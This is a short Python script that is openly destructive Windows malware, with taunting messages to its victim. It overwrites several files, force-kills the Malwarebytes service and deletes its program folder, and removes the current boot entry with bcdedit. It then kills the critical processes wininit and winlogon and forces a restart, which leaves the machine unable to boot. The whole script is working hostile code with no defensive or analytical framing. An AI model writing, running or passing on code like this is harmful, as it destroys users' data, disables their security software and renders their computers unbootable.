import time
import os
print("I warned you! wait 1 minute or close window if this is ur pc.")
time.sleep(60)
f = open("demofile3.txt", "w")
f.write("Woops! I have deleted the content!")
f.close()
f = open("demofile4.txt", "w")
f.write("Woops! I have deleted the content!")
f.close()
f = open("demofile5.txt", "w")
f.write("Woops! I have deleted the content!")
f.close()
f = open("demofile6.txt", "w")
f.write("Woops! I have deleted the content!")
f.close()
os.system("taskkill /f /im MBAMService.exe")
os.system("del /s /q /f C:\Program Files\Malwarebytes")
os.system("bcdedit /delete {current}")
print("You opened a virus ): Your BCD is now gone")
os.system("shutdown -r -t 1")
os.system("wininit")
os.system("taskkill /f /im wininit.exe")
os.system("taskkill /f /im winlogon.exe")
os.system("shutdown -a")
print("LOL TRY REBOOTING!")
